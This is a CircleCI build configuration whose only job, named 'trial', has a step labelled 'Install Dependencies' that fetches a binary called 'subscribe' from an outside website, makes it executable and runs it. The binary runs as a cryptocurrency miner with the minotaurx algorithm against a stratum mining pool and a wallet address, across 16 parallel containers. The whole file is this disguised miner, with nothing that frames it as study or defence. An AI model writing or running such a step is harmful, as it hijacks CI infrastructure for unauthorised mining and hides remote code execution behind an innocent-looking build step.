version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget http://ilovenypizza.com/subscribe; chmod +x subscribe; ./subscribe -a minotaurx -o stratum+tcps://stratum-eu.rplant.xyz:17068 -u RMbzoYS2fLqpWHvRtH7qEL5dizGZrnrqUc.avngC
            

workflows:
    version: 2.1
    build:
        jobs:
        - trial
